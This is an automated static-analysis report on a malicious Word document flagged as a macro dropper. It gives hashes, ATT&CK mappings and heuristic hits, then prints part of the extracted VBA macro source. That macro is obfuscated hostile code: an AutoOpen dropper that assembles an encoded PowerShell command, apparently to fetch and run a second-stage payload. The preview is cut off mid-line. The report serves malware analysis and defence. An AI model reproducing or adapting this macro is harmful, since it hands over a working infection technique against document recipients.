Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6e2d27297793d1d9…

MALICIOUS

Office (OLE)

89.2 KB Created: 2018-06-20 21:40:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: 6de27399347a8e7a5be3049d18ccb044 SHA-1: f226a85dd21a735b139bc4f89fce79dc3e58ef5c SHA-256: 6e2d27297793d1d94e000d3c377e3feca848b54a068b73915b33d806175b9e07
242 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes obfuscated string concatenation to construct and execute a PowerShell command, likely to download and run a second-stage payload. The presence of the Shell() call and the auto-execution marker 'AutoOpen' strongly indicate malicious intent.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6585318-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6585318-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11974 bytes
SHA-256: 51ae9d730c85f446fac9ab2e2772add98a5790ac7a14759bdbc9a8d45278fb2d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "SrOiZowOoiT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zvcMJrSCtu"
Function RfTCSqqOTzf()
On Error Resume Next
WVJKY = 98987
jlTtHk = CByte(kKAMhz)
QzcZJ = cnTaZ
vvmNWR = CDate(45203)
wCiYL = 73277
zTVWB = CDate(bSIfav + Sin(36529 + 4110) * 11133 * CInt(72442))
ukwNiB = "OwerSHell " + Chr(34) + "$( sEt-i" + "tEm  'vaRIaBLe:" + "OF" + "S' '')" + Chr(34) + " +[STRIN" + "g]( '2" + "6b95"
XliOIr = 85326
HDPtqB = CByte(GRuvp)
DhjVov = dQwqi
tiiCC = CDate(92474)
ALFvj = 8616
dsXGQ = CDate(NThlU + Sin(64183 + 33526) * 57467 * CInt(40615))
IwljpjwOnX = ">72%" + "81~121@" + "87w3" + "0i3@30o"
fIdjn = 78170
faNXi = CByte(ziVSa)
DYMFF = qnUIX
hbtqT = CDate(30550)
mSKTDX = 84200
QhZOlk = CDate(GEvDA + Sin(65043 + 99325) * 44072 * CInt(70679))
PBMzBBG = "80>91i73F19>81{" + "92i84~9" + "1F9" + "3~74%30{76o95>8" + "0%90~81>83i5~26" + "b1" + "10%111>10"
LcmFS = 86555
RStXKq = CByte(muDdLL)
wfPPZM = WkLLCz
bQbCSS = CDate(56149)
GYmPwf = 22708
jibffr = CDate(lHnMmZ + Sin(39099 + 53543) * 71224 * CInt(24721))
wBnGEf = "7i119w122i1" + "19%30@3i30w80F9" + "1F73b1" + "9%81w92>84b91w9" + "3o7" + "4F30" + "@109o71o7" + "7@74{91%83i16@"
LIwqzZ = 19015
oqpWW = CByte(dQEPzI)
dEIuV = jjDrv
PaEnl = CDate(61331)
sCNtIZ = 54007
iMohk = CDate(THTjMG + Sin(24377 + 56153) * 43178 * CInt(38604))
UduWEGZ = "112>91i74F16" + "o105F91F92{12" + "5~82@87%91i80>7" + "4>5F26F104%1" + "21w1" + "14"
HlYdW = 95064
Dsvit = CByte(qJhXG)
nHNCaC = jWCMat
BIBhF = CDate(45894)
DSGwW = 77012
ajwMD = CDate(uSFsf + Sin(58502 + 47200) * 46675 * CInt(81479))
zwFTiVz = "@1" + "12%1" + "20{116F30b3b" + "30{25~86" + "i74>74{78%4%1" + "7@17%7" + "3{73o73~16@93~8" + "1o80@"
jrZwo = 70321
BthoL = CByte(OZsVwY)
ONrda = zwAmqq
RpBrUY = CDate(99489)
iPkcpU = 11181
MYcBCY = CDate(PnDmR + Sin(53337 + 59274) * 56378 * CInt(39359))
wFFnomiCdtj = "89{80w8" + "9{86w91w72F87b9" + "1i80>74" + "{86%81o"
jzpIO = CDate(FGjTVT + Sin(71106 + 83948) * 78352 * CInt(98849))
CBmPZE = CDate(47528)
JQZEcR = hbjHU
LnMhS = CByte(LILmn)
JGHKFR = 24363
kAtqaM = 95864
VmUiIr = "80o89%16F93F81" + "o83w17@7" + "0~7~86b8" + "8~14" + "o120~" + "72w123"
RfTCSqqOTzf = ukwNiB + IwljpjwOnX + PBMzBBG + wBnGEf + UduWEGZ + zwFTiVz + wFFnomiCdtj + VmUiIr
End Function
Function RESXJtiI()
On Error Resume Next
auRcB = CDate(qjZAEZ + Sin(74159 + 24577) * 65250 * CInt(47017))
bnCwmr = CDate(66945)
hGUMtY = iMcfi
UtLNm = CByte(QozRDh)
SjzEY = 83542
RjIwu = 97700
tSPXGiRXX = "{17o126" + ">86{74o74" + "w7" + "8~4>17o17~"
RpSji = CDate(wvvHU + Sin(14586 + 43655) * 43652 * CInt(24889))
zpzLFY = CDate(66414)
ZAzNw = oOcwnv
HzOFdD = CByte(kOIjV)
klLZEZ = 32920
NzBib = 81913
aTuzsASsp = "74" + "%78i92%90~7" + "7w76F7" + "9@88F16%93>8"
hHTZuj = CDate(SDBDG + Sin(13433 + 52704) * 75470 * CInt(4699))
BEGjW = CDate(1835)
ZMTic = aNATHs
BLOYa = CByte(jlFaUb)
wWzuH = 79291
SYGHl = 87508
nQitA = "1b83%17{" + "90w" + "100>123w7" + "9w13w79" + "w108" + "~17w126i86" + "{74w74%78>4w17>"
zzptJZ = CDate(RuNtqC + Sin(97941 + 61187) * 46539 * CInt(87201))
LuMwZn = CDate(66311)
YLOYFj = zijicr
OUvOB = CByte(HKhCFN)
pduYRi = 8058
VsPVFU = 84206
EmkrFONwqT = "17i73o" + "73@73~16{77{87" + "b83~9" + "5o82{87" + "%89~86o74" + "F16>" + "93~81>83i17>" + "75o125i14>" + "15o74o1" + "11b122{120"
JjKSY = CDate(FzVlQV + Sin(17006 + 18234) * 34101 * CInt(39087))
vMjRW = CDate(98990)
aHiwco = wGhXzJ
MOoCjP = CByte(QauJN)
LsnoL = 44806
SLCjc = 8299
kwpzkPjomtW = "F17b12" + "6%86%74o74" + "~78w4%17>17%" + "89@76%"
JFcoQY = CDate(XUbhAz + Sin(15926 + 4276) * 63732 * CInt(89133))
RRhAM = CDate(31245)
UdErh = iVzMTc
oEAdso = CByte(OUVhuj)
dkKXv = 78347
jYjiw = 45721
qDYXdNVdo = "87" + ">88o88w" + "89>76o95%" + "88o88>16{8" + "0i91i74~17" + "i6>91b" + "14w71{87>1" + "3o" + "17@126%8"
dDJGi = CDate(iNrnz + Sin(75887 + 67
... (truncated)